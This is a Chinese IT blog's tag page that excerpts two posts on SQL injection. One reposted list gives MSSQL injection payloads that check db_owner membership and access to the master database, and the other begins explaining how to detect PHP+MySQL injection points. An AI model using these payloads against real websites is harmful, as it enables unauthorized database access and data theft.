小灰博客--小灰IT技术博客 | sky00.com

Tag 文档归类: mysql注入

  • 常用注入命令[转]

    //看看是什么权限的

    and 1=(Select IS_MEMBER(‘db_owner’))

    And char(124)%2BCast(IS_MEMBER(‘db_owner’) as varchar(1))%2Bchar(124)=1 ;–

    //检测是否有读取某数据库的权限

    and 1= (Select HAS_DBACCESS(‘master’))

    And char(1 [Read More…]

  • MYSQL注入

    大家都知道,危害我们网站安全较多的漏洞还是注射漏洞。无论腾讯、百度、SINA等等大型网站都惊现过注入漏洞,今天讲解的是PHP+MYSQL的注入。我们注重的不是WEB语言而是数据库.了解一条SQL语句是如何运行。

    常规WEB语言与数据库搭配方法:php+mysql、ASP+ACC、JSP+ORACLE、ASPX+MSSQL等等搭配都有

    以下判断是否存在注入漏洞的语句.其中/*在MYSQL中是 [Read More…]